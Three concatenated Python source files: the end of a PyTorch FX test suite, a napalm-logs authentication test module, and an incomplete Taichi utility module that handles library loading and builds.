torch.fx._symbolic_trace import _wrapped_methods_to_patch _wrapped_methods_to_patch.append((torch.Tensor, "__getitem__")) try: TestFX().getitem_inner() finally: _wrapped_methods_to_patch.pop() class TestOperatorSignatures(JitTestCase): def setUp(self): # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag @onlyCPU @ops(op_db, allowed_dtypes=(torch.float,)) def test_get_torch_func_signature_exhaustive(self, device, dtype, op): if not isinstance(op.op, types.BuiltinFunctionType): raise unittest.SkipTest("This path doesn't work on Python functions") sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False) schemas = get_signature_for_torch_op(op.op) if not schemas: raise RuntimeError('No Schemas Returned') for sample_input in sample_inputs_itr: # Iterate through overloads until we hit a match. If we exit this # loop via `else`, we haven't found a match for schema in schemas: try: bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs) bound_args.apply_defaults() op(*bound_args.args, **bound_args.kwargs) break except TypeError as e: pass else: raise RuntimeError(f'Did not match any schemas for op {op.name}!') class TestFXAPIBackwardCompatibility(JitTestCase): def setUp(self): self.maxDiff = None # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag def _fn_to_stable_annotation_str(self, obj): """ Unfortunately we have to serialize function signatures manually since serialization for `inspect.Signature` objects is not stable across python versions """ fn_name = torch.typename(obj) signature = inspect.signature(obj) sig_str = f'{fn_name}{signature}' arg_strs = [] for k, v in signature.parameters.items(): maybe_type_annotation = f': {self._annotation_type_to_stable_str(v.annotation, sig_str)}'\ if v.annotation is not inspect.Signature.empty else '' def default_val_str(val): if isinstance(val, (tuple, list)): str_pieces = ['(' if isinstance(val, tuple) else '['] str_pieces.append(', '.join(default_val_str(v) for v in val)) if isinstance(val, tuple) and len(str_pieces) == 2: str_pieces.append(',') str_pieces.append(')' if isinstance(val, tuple) else ']') return ''.join(str_pieces) # Need to fix up some default value strings. # First case: modules. Default module `repr` contains the FS path of the module. # Don't leak that if isinstance(val, types.ModuleType): return f'<module {val.__name__}>' # Second case: callables. Callables (such as lambdas) encode their address in # their string repr. Don't do that if callable(val): return f'<function {val.__name__}>' return str(val) if v.default is not inspect.Signature.empty: default_val_str = default_val_str(v.default) if not isinstance(v.default, str) else f"'{v.default}'" maybe_default = f' = {default_val_str}' else: maybe_default = '' maybe_stars = '' if v.kind == inspect.Parameter.VAR_POSITIONAL: maybe_stars = '*' elif v.kind == inspect.Parameter.VAR_KEYWORD: maybe_stars = '**' arg_strs.append(f'{maybe_stars}{k}{maybe_type_annotation}{maybe_default}') return_annot = f' -> {self._annotation_type_to_stable_str(signature.return_annotation, sig_str)}'\ if signature.return_annotation is not inspect.Signature.empty else '' return f'{fn_name}({", ".join(arg_strs)}){return_annot}' def _annotation_type_to_stable_str(self, t, sig_str): if t is inspect.Signature.empty: return '' # Forward ref if isinstance(t, str): return f"'{t}'" if hasattr(typing, 'ForwardRef') and isinstance(t, typing.ForwardRef): return t.__forward_arg__ if hasattr(typing, '_ForwardRef') and isinstance(t, typing._ForwardRef): return t.__forward_arg__ trivial_mappings = { str : 'str', int : 'int', float: 'float', bool: 'bool', torch.dtype: 'torch.dtype', torch.Tensor: 'torch.Tensor', torch.device: 'torch.device', torch.memory_format: 'torch.memory_format', slice: 'slice', torch.nn.Module: 'torch.nn.modules.module.Module', torch.fx.Graph : 'torch.fx.graph.Graph', torch.fx.Node : 'torch.fx.node.Node', torch.fx.Proxy : 'torch.fx.proxy.Proxy', torch.fx.node.Target : 'torch.fx.node.Target', torch.fx.node.Argument : 'torch.fx.node.Argument', torch.fx.graph.PythonCode : 'torch.fx.graph.PythonCode', torch.fx.graph_module.GraphModule: 'torch.fx.graph_module.GraphModule', torch.fx.subgraph_rewriter.Match: 'torch.fx.subgraph_rewriter.Match', Ellipsis : '...', typing.Any: 'Any', type(None): 'NoneType', None: 'None', typing.Iterator: 'Iterator', } mapping = trivial_mappings.get(t, None) if mapping: return mapping # Handle types with contained types contained = getattr(t, '__args__', None) or [] # Callables contain a bare List for arguments contained = t if isinstance(t, list) else contained # Python 3.8 puts type vars into __args__ for unbound types such as Dict if all(isinstance(ct, typing.TypeVar) for ct in contained): contained = [] contained_type_annots = [self._annotation_type_to_stable_str(ct, sig_str) for ct in contained] contained_type_str = f'[{", ".join(contained_type_annots)}]' if len(contained_type_annots) > 0 else '' origin = getattr(t, '__origin__', None) if origin is None: # Unbound types don't have `__origin__` in some Python versions, so fix that up here. origin = t if t in {typing.Tuple, typing.Union, typing.Dict, typing.List, typing.Type, typing.Callable} else origin if origin in {tuple, typing.Tuple}: return f'Tuple{contained_type_str}' if origin in {typing.Union}: # Annoying hack to detect Optional if len(contained) == 2 and (contained[0] is type(None)) ^ (contained[1] is type(None)): not_none_param = contained[0] if contained[0] is not type(None) else contained[1] return f'Optional[{self._annotation_type_to_stable_str(not_none_param, sig_str)}]' return f'Union{contained_type_str}' if origin in {dict, typing.Dict}: return f'Dict{contained_type_str}' if origin in {list, typing.List}: return f'List{contained_type_str}' if origin in {type, typing.Type}: return f'Type{contained_type_str}' if isinstance(t, typing.Callable): if len(contained) > 0 and contained[0] is not Ellipsis: return f'Callable[[{", ".join(contained_type_annots[:-1])}], {contained_type_annots[-1]}]' else: return f'Callable{contained_type_str}' raise RuntimeError(f'Unrecognized type {t} used in BC-compatible type signature {sig_str}.' f'Please add support for this type and confirm with the ' f'FX team that your signature change is valid.') def test_function_back_compat(self): """ Test backward compatibility for function signatures with @compatibility(is_backward_compatible=True). Currently this checks for exact signature matches, which may lead to false positives. If this becomes too annoying, we can refine this check to actually parse out the saved schema strings and check if the change is truly backward- incompatible. """ signature_strs = [] for obj in _BACK_COMPAT_OBJECTS: if not isinstance(obj, type): signature_strs.append(self._fn_to_stable_annotation_str(obj)) signature_strs.sort() try: self.assertExpected('\n'.join(signature_strs), 'fx_backcompat_function_signatures') except AssertionError as e: msg = f"{e}\n****** ERROR ******\nAn FX function that has been marked " \ f"as backwards-compatible has experienced a signature change. See the " \ f"above exception context for more information. If this change was " \ f"unintended, please revert it. If it was intended, check with the FX " \ f"team to ensure that the proper deprecation protocols have been followed " \ f"and subsequently --accept the change." raise AssertionError(msg) def test_class_member_back_compat(self): """ Test backward compatibility for members of classes with @compatibility(is_backward_compatible=True). Currently this checks for exact matches on the publicly visible members of the class. """ class_method_strs = [] for obj in _BACK_COMPAT_OBJECTS: if isinstance(obj, type): public_members = [name for name in obj.__dict__ if not name.startswith('_')] class_method_strs.append(f'{torch.typename(obj)} {sorted(public_members)}') class_method_strs.sort() try: self.assertExpected('\n'.join(class_method_strs), 'fx_backcompat_class_members') except AssertionError as e: msg = f"{e}\n****** ERROR ******\nAn FX class that has been marked " \ f"as backwards-compatible has experienced change in its public members. See the " \ f"above exception context for more information. If this change was " \ f"unintended, please revert it. If it was intended, check with the FX " \ f"team to ensure that the proper deprecation protocols have been followed " \ f"and subsequently --accept the change." raise AssertionError(msg) def test_public_api_surface(self): non_back_compat_objects = {} def check_symbols_have_bc_designation(m, prefix): if not m.__name__.startswith('torch.fx'): return if m.__name__.startswith('torch.fx.experimental'): return for k, v in m.__dict__.items(): if v is m: continue if k.startswith('_'): continue if isinstance(v, types.ModuleType): check_symbols_have_bc_designation(v, prefix + [k]) elif isinstance(v, type) or isinstance(v, types.FunctionType): if v not in _MARKED_WITH_COMATIBLITY: non_back_compat_objects.setdefault(v) check_symbols_have_bc_designation(torch.fx, ['torch', 'fx']) check_symbols_have_bc_designation(torch.fx.passes, ['torch', 'fx', 'passes']) non_back_compat_strs = [torch.typename(obj) for obj in non_back_compat_objects.keys()] # Only want objects in torch.fx non_back_compat_strs = [ s for s in non_back_compat_strs if s.startswith('torch.fx') and not s.startswith('torch.fx.experimental')] # Only want objects in public namespaces non_back_compat_strs = [ s for s in non_back_compat_strs if all(not atom.startswith('_') for atom in s.split('.'))] non_back_compat_strs.sort() if len(non_back_compat_strs) != 0: raise AssertionError(f"Public FX API(s) {non_back_compat_strs} introduced but not given a " f"backwards-compatibility classification! Please decorate these " f"API(s) with `@torch.fx._compatibility.compatibility` to specify " f"BC guarantees.") class TestFunctionalTracing(JitTestCase): def setUp(self): # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary", "has_torch_function_variadic", "handle_torch_function", "boolean_dispatch") TO_PATCH = {"has_torch_function": None, "has_torch_function_unary": None, "has_torch_function_variadic": None} BUILT_IN_FUNC = (AssertionError, "") PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable") PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated") LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default") ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$") CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow") INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined") MUTABLE = (RuntimeError, r"Tried to trace mutable operation") UNTRACEABLE_FUNCTIONALS = { "adaptive_avg_pool1d": BUILT_IN_FUNC, "avg_pool1d": BUILT_IN_FUNC, "avg_pool2d": BUILT_IN_FUNC, "avg_pool3d": BUILT_IN_FUNC, "celu_": BUILT_IN_FUNC, "channel_shuffle": BUILT_IN_FUNC, "conv1d": BUILT_IN_FUNC, "conv2d": BUILT_IN_FUNC, "conv3d": BUILT_IN_FUNC, "conv_tbc": BUILT_IN_FUNC, "conv_transpose1d": BUILT_IN_FUNC, "conv_transpose2d": BUILT_IN_FUNC, "conv_transpose3d": BUILT_IN_FUNC, "cosine_similarity": BUILT_IN_FUNC, "elu_": BUILT_IN_FUNC, "hardtanh_": BUILT_IN_FUNC, "leaky_relu_": BUILT_IN_FUNC, "logsigmoid": BUILT_IN_FUNC, "one_hot": BUILT_IN_FUNC, "pdist": BUILT_IN_FUNC, "pixel_shuffle": BUILT_IN_FUNC, "pixel_unshuffle": BUILT_IN_FUNC, "relu_": BUILT_IN_FUNC, "rrelu_": BUILT_IN_FUNC, "selu_": BUILT_IN_FUNC, "softplus": BUILT_IN_FUNC, "softshrink": BUILT_IN_FUNC, "threshold_": BUILT_IN_FUNC, "adaptive_avg_pool2d": LEN_ERROR, "adaptive_avg_pool3d": LEN_ERROR, "adaptive_max_pool2d_with_indices": LEN_ERROR, "adaptive_max_pool3d_with_indices": LEN_ERROR, "instance_norm": CONTROL_FLOW, "pad": LEN_ERROR, "adaptive_max_pool1d": PROXY_ITERABLE, "adaptive_max_pool2d": PROXY_ITERABLE, "adaptive_max_pool3d": PROXY_ITERABLE, "fractional_max_pool2d": PROXY_ITERABLE, "fractional_max_pool3d": PROXY_ITERABLE, "max_pool1d": PROXY_ITERABLE, "max_pool2d": PROXY_ITERABLE, "max_pool3d": PROXY_ITERABLE, "group_norm": PROXY_ITERATED, "lp_pool2d": PROXY_ITERATED, "max_unpool1d": PROXY_ITERATED, "max_unpool2d": PROXY_ITERATED, "max_unpool3d": PROXY_ITERATED, "adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH, "fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH, "fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH, "gelu": CONTROL_FLOW, "hardshrink": ARG_TYPE_MISMATCH, "layer_norm": ARG_TYPE_MISMATCH, "lp_pool1d": ARG_TYPE_MISMATCH, "pairwise_distance": ARG_TYPE_MISMATCH, "affine_grid": CONTROL_FLOW, "alpha_dropout": CONTROL_FLOW, "batch_norm": CONTROL_FLOW, "binary_cross_entropy": CONTROL_FLOW, "binary_cross_entropy_with_logits": CONTROL_FLOW, "celu": CONTROL_FLOW, "cosine_embedding_loss": CONTROL_FLOW, "cross_entropy": CONTROL_FLOW, "ctc_loss": CONTROL_FLOW, "dropout": CONTROL_FLOW, "dropout2d": CONTROL_FLOW, "dropout3d": CONTROL_FLOW, "elu": CONTROL_FLOW, "embedding": CONTROL_FLOW, "embedding_bag": CONTROL_FLOW, "feature_alpha_dropout": CONTROL_FLOW, "fold": CONTROL_FLOW, "gaussian_nll_loss": CONTROL_FLOW, "glu": CONTROL_FLOW, "grid_sample": CONTROL_FLOW, "gumbel_softmax": CONTROL_FLOW, "hardsigmoid": CONTROL_FLOW, "hardswish": CONTROL_FLOW, "hardtanh": CONTROL_FLOW, "hinge_embedding_loss": CONTROL_FLOW, "huber_loss": CONTROL_FLOW, "interpolate": CONTROL_FLOW, "kl_div": CONTROL_FLOW, "l1_loss": CONTROL_FLOW, "leaky_relu": CONTROL_FLOW, "local_response_norm": CONTROL_FLOW, "margin_ranking_loss": CONTROL_FLOW, "max_pool1d_with_indices": CONTROL_FLOW, "max_pool2d_with_indices": CONTROL_FLOW, "max_pool3d_with_indices": CONTROL_FLOW, "mse_loss": CONTROL_FLOW, "multi_head_attention_forward": CONTROL_FLOW, "multi_margin_loss": CONTROL_FLOW, "multilabel_margin_loss": CONTROL_FLOW, "multilabel_soft_margin_loss": CONTROL_FLOW, "nll_loss": CONTROL_FLOW, "poisson_nll_loss": CONTROL_FLOW, "relu": CONTROL_FLOW, "relu6": CONTROL_FLOW, "rrelu": CONTROL_FLOW, "selu": CONTROL_FLOW, "silu": CONTROL_FLOW, "mish": CONTROL_FLOW, "smooth_l1_loss": CONTROL_FLOW, "soft_margin_loss": CONTROL_FLOW, "threshold": CONTROL_FLOW, "triplet_margin_loss": CONTROL_FLOW, "triplet_margin_with_distance_loss": CONTROL_FLOW, "unfold": CONTROL_FLOW, "upsample": CONTROL_FLOW, "upsample_bilinear": INTERPOLATE_ARGS_CONFLICT, "upsample_nearest": INTERPOLATE_ARGS_CONFLICT, "normalize" : MUTABLE, } # List of nn.functionals with Tensor inputs but not with type annotation FUNCTIONALS_WITHOUT_ANNOTATION = ( "adaptive_max_pool1d", "adaptive_max_pool2d", "adaptive_max_pool3d", "fractional_max_pool2d", "fractional_max_pool3d", "max_pool1d", "max_pool2d", "max_pool3d", "gaussian_nll_loss", "upsample", "upsample_bilinear", "upsample_nearest", ) # Inconsistent behavior between Python 3.8 and other Python versions: # - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED` # - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same # internal exception above # Use the following map to override the expected exception for Python 3.8 UNTRACEABLE_FUNCTIONALS_PY38 = { "adaptive_max_pool1d": PROXY_ITERATED, "adaptive_max_pool2d": PROXY_ITERATED, "adaptive_max_pool3d": PROXY_ITERATED, "fractional_max_pool2d": PROXY_ITERATED, "fractional_max_pool3d": PROXY_ITERATED, "max_pool1d": PROXY_ITERATED, "max_pool2d": PROXY_ITERATED, "max_pool3d": PROXY_ITERATED, "group_norm": LEN_ERROR } @classmethod def _get_functional(cls): functional_list = [] for f in dir(torch.nn.functional): if not f.islower(): continue # Ignore internal functions if f.startswith('_'): continue # Ignore supporting functions if f in cls.IGNORE_FUNCS: continue fn = getattr(torch.nn.functional, f) # Ignore non-callable object like modules if not isinstance(fn, Callable): continue if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION: try: sig = inspect.signature(fn) has_tensor_arg = False for arg, param in sig.parameters.items(): if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor): has_tensor_arg = True if not has_tensor_arg: continue # No signature or Object is not supported except ValueError: pass functional_list.append((f, fn)) return functional_list @classmethod def generate_test_func(cls, func_name, fn): def functional_test(self): if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \ sys.version_info >= (3, 8) and sys.version_info < (3, 10): exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name] with self.assertRaisesRegex(exc, err): symbolic_trace(fn) elif func_name in self.UNTRACEABLE_FUNCTIONALS: exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name] with self.assertRaisesRegex(exc, err): symbolic_trace(fn) else: symbolic_trace(fn) return functional_test @classmethod def generate_tests(cls): functional_list = cls._get_functional() for func_name, fn in functional_list: test_name = "test_nn_functional_" + func_name functional_test = cls.generate_test_func(func_name, fn) setattr(cls, test_name, functional_test) @classmethod def setUpClass(cls): def no(*args, **kwargs): return False for name in cls.TO_PATCH.keys(): cls.TO_PATCH[name] = getattr(torch.nn.functional, name) setattr(torch.nn.functional, name, no) @classmethod def tearDownClass(cls): for name in cls.TO_PATCH.keys(): setattr(torch.nn.functional, name, cls.TO_PATCH[name]) TestFunctionalTracing.generate_tests() instantiate_device_type_tests(TestOperatorSignatures, globals()) @skipIfNoTorchVision class TestVisionTracing(JitTestCase): def setUp(self): # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated") INCONSISTENT_TYPE = ( RuntimeError, r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor" ) UNTRACEABLE_MODELS = { "fasterrcnn_resnet50_fpn": PROXY_ITERATED, "fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED, "fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED, "maskrcnn_resnet50_fpn": PROXY_ITERATED, "keypointrcnn_resnet50_fpn": PROXY_ITERATED, "retinanet_resnet50_fpn": PROXY_ITERATED, } UNSCRIPTABLE_MODELS = { "googlenet": INCONSISTENT_TYPE, "inception_v3": INCONSISTENT_TYPE, } output_transform = { "fcn_resnet50": lambda x: x["out"], "fcn_resnet101": lambda x: x["out"], "deeplabv3_resnet50": lambda x: x["out"], "deeplabv3_resnet101": lambda x: x["out"], "deeplabv3_mobilenet_v3_large": lambda x: x["out"], "lraspp_mobilenet_v3_large": lambda x: x["out"], "fasterrcnn_resnet50_fpn": lambda x: x[1], "fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1], "fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1], "maskrcnn_resnet50_fpn": lambda x: x[1], "keypointrcnn_resnet50_fpn": lambda x: x[1], "retinanet_resnet50_fpn": lambda x: x[1], } @classmethod def generate_test_fn(cls, name, model_fn, x, kwargs): def run_test(self): model = model_fn(**kwargs) model = model.eval() if name in self.UNTRACEABLE_MODELS: err, exc = self.UNTRACEABLE_MODELS[name] with self.assertRaisesRegex(err, exc): graph = symbolic_trace(model) else: out_transform = self.output_transform.get(name, lambda x: x) graph : torch.fx.GraphModule = symbolic_trace(model) a = out_transform(model(x)) b = out_transform(graph(x)) self.assertEqual(a, b) if name in self.UNSCRIPTABLE_MODELS: err, exc = self.UNSCRIPTABLE_MODELS[name] with self.assertRaisesRegex(err, exc): script = torch.jit.script(graph) else: script = torch.jit.script(graph) c = out_transform(script(x)) self.assertEqual(a, c) return run_test @classmethod def generate_classification_tests(cls): for k, v in torchvision_models.__dict__.items(): if callable(v) and k[0].lower() == k[0] and k[0] != "_": test_name = 'test_torchvision_models_' + k x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224) kwargs = dict(num_classes=50) model_test = cls.generate_test_fn(k, v, x, kwargs) setattr(cls, test_name, model_test) @classmethod def generate_segmentation_tests(cls): for k, v in torchvision_models.segmentation.__dict__.items(): if callable(v) and k[0].lower() == k[0] and k[0] != "_": test_name = 'test_torchvision_models_segmentation_' + k x = torch.rand(1, 3, 32, 32) kwargs = dict(num_classes=10, pretrained_backbone=False) model_test = cls.generate_test_fn(k, v, x, kwargs) setattr(cls, test_name, model_test) @classmethod def generate_detection_tests(cls): for k, v in torchvision_models.detection.__dict__.items(): if callable(v) and k[0].lower() == k[0] and k[0] != "_": test_name = 'test_torchvision_models_detection_' + k x = [torch.rand(3, 300, 300)] kwargs = dict(num_classes=10, pretrained_backbone=False) model_test = cls.generate_test_fn(k, v, x, kwargs) setattr(cls, test_name, model_test) @classmethod def generate_video_tests(cls): for k, v in torchvision_models.video.__dict__.items(): if callable(v) and k[0].lower() == k[0] and k[0] != "_": test_name = 'test_torchvision_models_video_' + k x = torch.rand(1, 3, 4, 112, 112) kwargs = dict(num_classes=50) model_test = cls.generate_test_fn(k, v, x, kwargs) setattr(cls, test_name, model_test) @classmethod def generate_tests(cls): cls.generate_classification_tests() cls.generate_detection_tests() cls.generate_segmentation_tests() cls.generate_video_tests() if HAS_TORCHVISION: TestVisionTracing.generate_tests() if __name__ == '__main__': run_tests()
test_auth.py
# -*- coding: utf-8 -*- ''' Test the auth process. ''' from __future__ import absolute_import from __future__ import unicode_literals # Import pythond stdlib import time import logging from multiprocessing import Process # Import third party libs import pytest import nacl.utils import nacl.secret import nacl.signing import nacl.encoding # Import napalm-logs import napalm_logs.exceptions import napalm_logs.config as defaults from napalm_logs.utils import ClientAuth from napalm_logs.auth import NapalmLogsAuthProc log = logging.getLogger(__name__) AUTH_PROC = None def _generate_test_keys(): ''' Generate proper PK and SGN keys. ''' log.debug('Generating a testing private key') priv_key = nacl.utils.random(nacl.secret.SecretBox.KEY_SIZE) log.debug('Generating the signing key') signing_key = nacl.signing.SigningKey.generate() verify_key = signing_key.verify_key sgn_verify_hex = verify_key.encode(encoder=nacl.encoding.HexEncoder) return priv_key, sgn_verify_hex def test_invalid_cert(): ''' Testing if the auth process dies when unable to open the SSL certificate or keyfile. ''' nlap = NapalmLogsAuthProc('fake_cert', 'fake_keyfile', 'fake_pk', 'fake_hex') with pytest.raises(IOError): nlap.start() def test_crt_missmatch(): ''' Forged certificate should raise napalm_logs.exceptions.SSLMismatchException. ''' nlap = NapalmLogsAuthProc('tests/auth/forged.crt', 'tests/auth/forged.key', 'fake_pk', 'fake_hex') with pytest.raises(napalm_logs.exceptions.SSLMismatchException): nlap.start() def test_client_auth_fail_server_down(): ''' Test client connect failure when server is not started yet. ''' with pytest.raises(napalm_logs.exceptions.ClientConnectException): client = ClientAuth('tests/auth/server.crt', # noqa max_try=1, timeout=.1) def test_successful_start(): ''' Test that the auth process can start properly when valid certificate and key are configured. ''' global AUTH_PROC pk, sgn_key = _generate_test_keys() nlap = NapalmLogsAuthProc('tests/auth/server.crt', 'tests/auth/server.key', pk, sgn_key) AUTH_PROC = Process(target=nlap.start) AUTH_PROC.start() def test_twice_bind(): ''' Test that binding twice on the same host/port fails, and raises napalm_logs.exceptions.BindException. ''' pk, sgn_key = _generate_test_keys() nlap = NapalmLogsAuthProc('tests/auth/server.crt', 'tests/auth/server.key', pk, sgn_key) assert AUTH_PROC.is_alive() time.sleep(.1) # waiting for the auth socket with pytest.raises(napalm_logs.exceptions.BindException): nlap.start() nlap.stop() def test_client_auth_fail_wrong_port(): ''' Test client connect failure on wrong server port. ''' assert AUTH_PROC.is_alive() with pytest.raises(napalm_logs.exceptions.ClientConnectException): client = ClientAuth('tests/auth/server.crt', port=1234, max_try=1, timeout=.1) client.stop() def test_client_auth(): ''' Test the auth process startup and a client that retrieves the pk and sgn key. ''' assert AUTH_PROC.is_alive() time.sleep(.1) # waiting for the auth socket client = ClientAuth('tests/auth/server.crt') client.stop() def test_client_keep_alive(): ''' Test that the client receives keepalives from the auth process. ''' assert AUTH_PROC.is_alive() client = ClientAuth('tests/auth/server.crt', max_try=1, timeout=.1) time.sleep(.1) # wait for the client socket client.ssl_skt.close() # force client socket close # wait for another keepalive exchange time.sleep(defaults.AUTH_KEEP_ALIVE_INTERVAL) client.stop() # client.stop() tries to close the auth SSL socket # if not alive anymore, this will raise an exception # therefore the test will fail def test_successful_stop(): ''' Test if able to stop properly the auth process. ''' assert AUTH_PROC.is_alive() AUTH_PROC.terminate() AUTH_PROC.join()
util.py
import os import re import shutil import sys import ctypes from pathlib import Path from colorama import Fore, Back, Style from .settings import * if sys.version_info[0] < 3 or sys.version_info[1] <= 5: print("\nPlease restart with Python 3.6+\n") print("Current Python version:", sys.version_info) exit(-1) ti_core = None def in_docker(): if os.environ.get("TI_IN_DOCKER", "") == "": return False else: return True def import_ti_core(tmp_dir=None): global ti_core if get_os_name() != 'win': old_flags = sys.getdlopenflags() sys.setdlopenflags(2 | 8) # RTLD_NOW | RTLD_DEEPBIND else: pyddir = os.path.join(package_root(), 'lib') os.environ['PATH'] += ';' + pyddir try: import taichi_core as core except Exception as e: if isinstance(e, ImportError): print( Fore.YELLOW + "Share object taichi_core import failed, " "check this page for possible solutions:\n" "https://taichi.readthedocs.io/en/stable/install.html#troubleshooting" + Fore.RESET) raise e ti_core = core if get_os_name() != 'win': sys.setdlopenflags(old_flags) lib_dir = os.path.join(package_root(), 'lib') core.set_lib_dir(locale_encode(lib_dir)) if tmp_dir is not None: core.set_tmp_dir(locale_encode(tmp_dir)) def locale_encode(s): try: import locale return s.encode(locale.getdefaultlocale()[1]) except TypeError: return s.encode('utf8') def is_ci(): return os.environ.get('TI_CI', '') == '1' def package_root(): return os.path.join(os.path.dirname(os.path.realpath(__file__)), '../') def is_release(): return os.environ.get('TAICHI_REPO_DIR', '') == '' def get_core_shared_object(): if is_release(): directory = os.path.join(package_root(), 'lib') else: directory = get_bin_directory() return os.path.join(directory, 'libtaichi_core.so') def get_repo(): from git import Repo repo = Repo(get_repo_directory()) return repo def print_red_bold(*args, **kwargs): print(Fore.RED + Style.BRIGHT, end='') print(*args, **kwargs) print(Style.RESET_ALL, end='') create_sand_box_on_windows = True def build(): tmp_cwd = os.getcwd() bin_dir = get_build_directory() try: os.mkdir(bin_dir) except: pass os.chdir(bin_dir) import multiprocessing print('Building taichi...') num_make_threads = min(20, multiprocessing.cpu_count()) if get_os_name() == 'win': make_ret = os.system( "msbuild /p:Configuration=Release /p:Platform=x64 /m taichi.sln") else: make_ret = os.system('make -j {}'.format(num_make_threads)) if make_ret != 0: print(' Error: Build failed.') exit(-1) os.chdir(tmp_cwd) def check_exists(src): if not os.path.exists(src): raise FileNotFoundError( f'File "{src}" not exist. Installation corrupted or build incomplete?' ) def prepare_sandbox(): ''' Returns a temporary directory, which will be automatically deleted on exit. It may contain the taichi_core shared object or some misc. files. ''' import atexit import shutil from tempfile import mkdtemp tmp_dir = mkdtemp(prefix='taichi-') atexit.register(shutil.rmtree, tmp_dir) print(f'[Taichi] preparing sandbox at {tmp_dir}') os.mkdir(os.path.join(tmp_dir, 'runtime/')) return tmp_dir def get_unique_task_id(): import datetime import random return datetime.datetime.now().strftime('task-%Y-%m-%d-%H-%M-%S-r') + ( '%05d' % random.randint(0, 10000)) if is_release(): print("[Taichi] mode=release") sys.path.append(os.path.join(package_root(), 'lib')) if get_os_name() != 'win': link_src = os.path.join(package_root(), 'lib', 'taichi_core.so') link_dst = os.path.join(package_root(), 'lib', 'libtaichi_core.so') # For llvm jit to find the runtime symbols if not os.path.exists(link_dst): os.symlink(link_src, link_dst) import_ti_core() if get_os_name() != 'win': dll = ctypes.CDLL(get_core_shared_object(), mode=ctypes.RTLD_LOCAL) # The C backend needs a temporary directory for the generated .c and compiled .so files: ti_core.set_tmp_dir(prepare_sandbox( )) # TODO: always allocate a tmp_dir for all situations ti_core.set_python_package_dir(package_root()) os.makedirs(ti_core.get_repo_dir(), exist_ok=True) else: print("[Taichi] mode=development") if get_os_name() == 'osx': bin_dir = get_bin_directory() os.environ['DYLD_FALLBACK_LIBRARY_PATH'] = get_runtime_directory() lib_path = os.path.join(bin_dir, 'libtaichi_core.dylib') tmp_cwd = os.getcwd() tmp_dir = prepare_sandbox() check_exists(lib_path) shutil.copy(lib_path, os.path.join(tmp_dir, 'taichi_core.so')) os.chdir(tmp_dir) sys.path.append(tmp_dir) import taichi_core as ti_core os.chdir(tmp_cwd) # TODO: unify importing infrastructure: elif get_os_name() == 'linux': bin_dir = get_bin_directory() if 'LD_LIBRARY_PATH' in os.environ: os.environ['LD_LIBRARY_PATH'] += ':/usr/lib64/' else: os.environ['LD_LIBRARY_PATH'] = '/usr/lib64/' lib_path = os.path.join(bin_dir, 'libtaichi_core.so') check_exists(lib_path) tmp_cwd = os.getcwd() tmp_dir = prepare_sandbox() check_exists(lib_path) shutil.copy(lib_path, os.path.join(tmp_dir, 'taichi_core.so')) os.chdir(tmp_dir) sys.path.append(tmp_dir) try: import_ti_core(tmp_dir) except Exception as e: from colorama import Fore, Back, Style print_red_bold("Taichi core import failed: ", end='') print(e) exit(-1) os.chdir(tmp_cwd) elif get_os_name() == 'win': bin_dir = get_bin_directory() dll_path_invalid = os.path.join(bin_dir, 'libtaichi_core.dll') assert not os.path.exists(dll_path_invalid) possible_folders = ['Debug', 'RelWithDebInfo', 'Release'] detected_dlls = [] for folder in possible_folders: dll_path = os.path.join(bin_dir, folder, 'taichi_core.dll') if os.path.exists(dll_path): detected_dlls.append(dll_path) if len(detected_dlls) == 0: raise FileNotFoundError( f'Cannot find Taichi core dll under {get_bin_directory()}/{possible_folders}' ) elif len(detected_dlls) != 1: print('Warning: multiple Taichi core dlls found:') for dll in detected_dlls: print(' ', dll) print(f'Using {detected_dlls[0]}') dll_path = detected_dlls[0] # On windows when an dll/pyd is loaded, we cannot write to it any more old_wd = os.getcwd() os.chdir(bin_dir) if create_sand_box_on_windows: # Create a sandbox for separated core lib development and loading folder = 